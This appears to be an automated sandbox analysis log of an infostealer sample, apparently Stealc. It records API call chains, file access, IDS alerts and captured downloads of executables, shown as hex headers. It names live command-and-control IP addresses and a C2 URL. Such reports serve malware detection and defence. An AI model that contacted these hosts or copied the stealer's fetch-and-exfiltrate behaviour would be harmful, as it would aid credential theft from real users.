                              Source: Binary string: wntdll.pdbUGP source: run.exe, 00000005.00000002.2297527350.0000000004060000.00000004.00000800.00020000.00000000.sdmp, run.exe, 00000005.00000002.2297404283.0000000003D0D000.00000004.00000020.00020000.00000000.sdmp, run.exe, 00000005.00000002.2296477415.00000000027E3000.00000004.00000001.00020000.00000000.sdmp, cmd.exe, 00000006.00000002.2594738875.00000000052C7000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000006.00000002.2594968333.00000000057A0000.00000004.00001000.00020000.00000000.sdmp, run.exe, 0000000D.00000002.2729599032.0000000002B4B000.00000004.00000020.00020000.00000000.sdmp, run.exe, 0000000D.00000002.2730864076.0000000003F90000.00000004.00000800.00020000.00000000.sdmp, run.exe, 0000000D.00000002.2731390962.000000000434D000.00000004.00000001.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.2971130898.00000000053CD000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.2971777839.00000000058A0000.00000004.00001000.00020000.00000000.sdmp
                              Source: Binary string: wntdll.pdb source: run.exe, 00000005.00000002.2297527350.0000000004060000.00000004.00000800.00020000.00000000.sdmp, run.exe, 00000005.00000002.2297404283.0000000003D0D000.00000004.00000020.00020000.00000000.sdmp, run.exe, 00000005.00000002.2296477415.00000000027E3000.00000004.00000001.00020000.00000000.sdmp, cmd.exe, 00000006.00000002.2594738875.00000000052C7000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000006.00000002.2594968333.00000000057A0000.00000004.00001000.00020000.00000000.sdmp, run.exe, 0000000D.00000002.2729599032.0000000002B4B000.00000004.00000020.00020000.00000000.sdmp, run.exe, 0000000D.00000002.2730864076.0000000003F90000.00000004.00000800.00020000.00000000.sdmp, run.exe, 0000000D.00000002.2731390962.000000000434D000.00000004.00000001.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.2971130898.00000000053CD000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.2971777839.00000000058A0000.00000004.00001000.00020000.00000000.sdmp
                              Source: Binary string: nss3.pdb source: u3bs.0.exe, 00000001.00000002.3000426783.000000006C7EF000.00000002.00000001.01000000.0000000E.sdmp, nss3.dll.1.dr
                              Source: Binary string: mozglue.pdb source: u3bs.0.exe, 00000001.00000002.3000172232.000000006B0ED000.00000002.00000001.01000000.0000000F.sdmp, mozglue.dll.1.dr
                              Source: Binary string: C:\Users\ICP221\perforce\_perforce\Installer\UniversalInstaller\2.5.30\Project\UIxStandard\Win\Release\UniversalInstaller.pdb source: run.exe, 00000005.00000002.2295837403.000000000022C000.00000002.00000001.01000000.00000009.sdmp, run.exe, 00000005.00000000.2239188364.000000000022C000.00000002.00000001.01000000.00000009.sdmp, run.exe, 0000000D.00000002.2727602802.000000000022C000.00000002.00000001.01000000.00000009.sdmp, run.exe, 0000000D.00000000.2649348113.000000000022C000.00000002.00000001.01000000.00000009.sdmp, run.exe.0.dr
                              Source: Binary string: M:\DATA\Projects\BitClipper2017\Release\BitClipper2017.pdb source: HDBKJEGIEB.exe, 0000001A.00000002.2969121960.0000000000B0C000.00000002.00000001.01000000.00000014.sdmp, HDBKJEGIEB.exe, 0000001A.00000000.2862082755.0000000000B0C000.00000002.00000001.01000000.00000014.sdmp, tiktok[1].exe.1.dr
                              Source: Binary string: C:\Users\ICP221\perforce\_perforce\Installer\UniversalInstaller\2.5.30\Project\UIxStandard\Win\Release\UIxMarketPlugin.pdb source: UIxMarketPlugin.dll.5.dr
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exeCode function: 1_2_00412570 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,1_2_00412570
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exeCode function: 1_2_0040D1C0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,1_2_0040D1C0
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exeCode function: 1_2_004015C0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,1_2_004015C0
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exeCode function: 1_2_00411650 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,1_2_00411650
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exeCode function: 1_2_0040B610 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,1_2_0040B610
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exeCode function: 1_2_0040DB60 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,1_2_0040DB60
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exeCode function: 1_2_00411B80 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,1_2_00411B80
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exeCode function: 1_2_0040D540 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,1_2_0040D540
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exeCode function: 1_2_004121F0 GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,1_2_004121F0
                              Source: C:\Users\user\Desktop\TNQTc6Qmkg.exeFile opened: C:\Users\userJump to behavior
                              Source: C:\Users\user\Desktop\TNQTc6Qmkg.exeFile opened: C:\Users\user\AppDataJump to behavior
                              Source: C:\Users\user\Desktop\TNQTc6Qmkg.exeFile opened: C:\Users\user\AppData\Local\TempJump to behavior
                              Source: C:\Users\user\Desktop\TNQTc6Qmkg.exeFile opened: C:\Users\user\AppData\LocalJump to behavior
                              Source: C:\Users\user\Desktop\TNQTc6Qmkg.exeFile opened: C:\Users\user\AppData\Local\Temp\u3bs.2\run.exeJump to behavior
                              Source: C:\Users\user\Desktop\TNQTc6Qmkg.exeFile opened: C:\Users\user\AppData\Local\Temp\u3bs.2Jump to behavior

                              Networking

                              barindex
                              Source: TrafficSnort IDS: 2856233 ETPRO TROJAN Win32/Unknown Loader Related Activity (GET) 192.168.2.4:49730 -> 185.172.128.90:80
                              Source: TrafficSnort IDS: 2044243 ET TROJAN [SEKOIA.IO] Win32/Stealc C2 Check-in 192.168.2.4:49733 -> 185.172.128.76:80
                              Source: TrafficSnort IDS: 2044244 ET TROJAN Win32/Stealc Requesting browsers Config from C2 192.168.2.4:49733 -> 185.172.128.76:80
                              Source: TrafficSnort IDS: 2051828 ET TROJAN Win32/Stealc Active C2 Responding with browsers Config M1 185.172.128.76:80 -> 192.168.2.4:49733
                              Source: TrafficSnort IDS: 2044246 ET TROJAN Win32/Stealc Requesting plugins Config from C2 192.168.2.4:49733 -> 185.172.128.76:80
                              Source: TrafficSnort IDS: 2051831 ET TROJAN Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1 185.172.128.76:80 -> 192.168.2.4:49733
                              Source: Malware configuration extractorURLs: 185.172.128.76/3cd2b41cbde8fc9c.php
                              Source: Malware configuration extractorURLs: http://185.172.128.76/3cd2b41cbde8fc9c.php
                              Source: global trafficTCP traffic: 91.215.85.66 ports 1,4,5,6,7,15647
                              Source: global trafficTCP traffic: 192.168.2.4:49759 -> 91.215.85.66:15647
                              Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Sat, 27 Apr 2024 00:19:00 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Sat, 27 Apr 2024 00:15:01 GMTETag: "47e00-61708e94e86ef"Accept-Ranges: bytesContent-Length: 294400Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 0f 14 d4 08 4b 75 ba 5b 4b 75 ba 5b 4b 75 ba 5b 46 27 65 5b 55 75 ba 5b 46 27 5a 5b c3 75 ba 5b 46 27 5b 5b 64 75 ba 5b 42 0d 29 5b 48 75 ba 5b 4b 75 bb 5b 3b 75 ba 5b fe eb 5f 5b 4a 75 ba 5b 46 27 61 5b 4a 75 ba 5b fe eb 64 5b 4a 75 ba 5b 52 69 63 68 4b 75 ba 5b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 75 f1 78 64 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0c 00 00 1a 01 00 00 3a c2 03 00 00 00 00 02 41 00 00 00 10 00 00 00 30 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 80 c3 03 00 04 00 00 5d 8c 04 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 f4 93 01 00 28 00 00 00 00 f0 c1 03 88 68 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 c3 03 5c 14 00 00 00 32 01 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c8 88 01 00 40 00 00 00 00 00 00 00 00 00 00 00 00 30 01 00 8c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 93 18 01 00 00 10 00 00 00 1a 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 ce 6c 00 00 00 30 01 00 00 6e 00 00 00 1e 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 a8 4b c0 03 00 a0 01 00 00 72 01 00 00 8c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 88 68 01 00 00 f0 c1 03 00 6a 01 00 00 fe 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 5c 14 00 00 00 60 c3 03 00 16 00 00 00 68 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                              Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 27 Apr 2024 00:19:06 GMTContent-Type: application/x-msdos-programContent-Length: 1106998Connection: keep-aliveLast-Modified: Mon, 05 Sep 2022 11:30:30 GMTETag: "10e436-5e7ec6832a180"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 d7 dd 15 63 00 92 0e 00 bf 13 00 00 e0 00 06 21 0b 01 02 19 00 26 0b 00 00 16 0d 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 40 0b 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 30 0f 00 00 06 00 00 1c 3a 11 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 d0 0c 00 88 2a 00 00 00 00 0d 00 d0 0c 00 00 00 30 0d 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 0d 00 18 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 20 0d 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c 02 0d 00 d0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 84 25 0b 00 00 10 00 00 00 26 0b 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 50 60 2e 64 61 74 61 00 00 00 7c 27 00 00 00 40 0b 00 00 28 00 00 00 2c 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 c0 2e 72 64 61 74 61 00 00 70 44 01 00 00 70 0b 00 00 46 01 00 00 54 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 40 2e 62 73 73 00 00 00 00 28 08 00 00 00 c0 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 60 c0 2e 65 64 61 74 61 00 00 88 2a 00 00 00 d0 0c 00 00 2c 00 00 00 9a 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 69 64 61 74 61 00 00 d0 0c 00 00 00 00 0d 00 00 0e 00 00 00 c6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 2c 00 00 00 00 10 0d 00 00 02 00 00 00 d4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 74 6c 73 00 00 00 00 20 00 00 00 00 20 0d 00 00 02 00 00 00 d6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 73 72 63 00 00 00 a8 04 00 00 00 30 0d 00 00 06 00 00 00 d8 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 65 6c 6f 63 00 00 18 3c 00 00 00 40 0d 00 00 3e 00 00 00 de 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 34 00 00 00 00 00 00 38 05 00 00 00 80 0d 00 00 06 00 00 00 1c 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 42 2f 31 39 00 00 00 00 00 52 c8 00 00 00 90 0d 00 00 ca 00 00 00 22 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 33 31 00 00 00 00 00 5d 27 00 00 00 60 0e 00 00 28 00 00 00 ec 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 34 35 00 00 00 00 00 9a
                              Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 27 Apr 2024 00:19:29 GMTContent-Type: application/x-msdos-programContent-Length: 685392Connection: keep-aliveLast-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "a7550-5e7e950876500"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00 00 00 90 0a 00 78 03 00 00 00 00 00 00 00 00 00 00 00 46 0a 00 50 2f 00 00 00 a0 0a 00 f0 23 00 00 94 16 0a 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 20 08 00 a0 00 00 00 00 00 00 00 00 00 00 00 a4 1e 0a 00 40 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 95 0c 08 00 00 10 00 00 00 0e 08 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 c4 06 02 00 00 20 08 00 00 08 02 00 00 12 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 3c 46 00 00 00 30 0a 00 00 02 00 00 00 1a 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 80 0a 00 00 02 00 00 00 1c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 90 0a 00 00 04 00 00 00 1e 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 f0 23 00 00 00 a0 0a 00 00 24 00 00 00 22 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                              Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 27 Apr 2024 00:19:40 GMTContent-Type: application/x-msdos-programContent-Length: 608080Connection: keep-aliveLast-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "94750-5e7e950876500"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00 00 00 20 09 00 b0 08 00 00 00 00 00 00 00 00 00 00 00 18 09 00 50 2f 00 00 00 30 09 00 d8 41 00 00 14 53 08 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bc f8 07 00 18 00 00 00 68 d0 07 00 a0 00 00 00 00 00 00 00 00 00 00 00 ec bc 08 00 dc 03 00 00 e4 5a 08 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 61 b5 07 00 00 10 00 00 00 b6 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 94 09 01 00 00 d0 07 00 00 0a 01 00 00 ba 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 1d 00 00 00 e0 08 00 00 04 00 00 00 c4 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 00 09 00 00 02 00 00 00 c8 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 74 6c 73 00 00 00 00 15 00 00 00 00 10 09 00 00 02 00 00 00 ca 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 b0 08 00 00 00 20 09 00 00 0a 00 00 00 cc 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 d8 41 00 00 00 30 09 00 00 42 00 00 00 d6 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                              Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 27 Apr 2024 00:19:46 GMTContent-Type: application/x-msdos-programContent-Length: 450024Connection: keep-aliveLast-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "6dde8-5e7e950876500"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 82 ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 28 06 00 00 82 00 00 00 00 00 00 60 d9 03 00 00 10 00 00 00 40 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 f0 06 00 00 04 00 00 2c e0 06 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 10 67 04 00 82 cf 01 00 e8 72 06 00 18 01 00 00 00 a0 06 00 f0 03 00 00 00 00 00 00 00 00 00 00 00 9c 06 00 e8 41 00 00 00 b0 06 00 ac 3d 00 00 60 78 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 77 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 70 06 00 e4 02 00 00 c0 63 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 92 26 06 00 00 10 00 00 00 28 06 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 29 00 00 00 40 06 00 00 18 00 00 00 2c 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 ac 13 00 00 00 70 06 00 00 14 00 00 00 44 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 69 64 61 74 00 00 34 00 00 00 00 90 06 00 00 02 00 00 00 58 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f0 03 00 00 00 a0 06 00 00 04 00 00 00 5a 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 ac 3d 00 00 00 b0 06 00 00 3e 00 00 00 5e 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
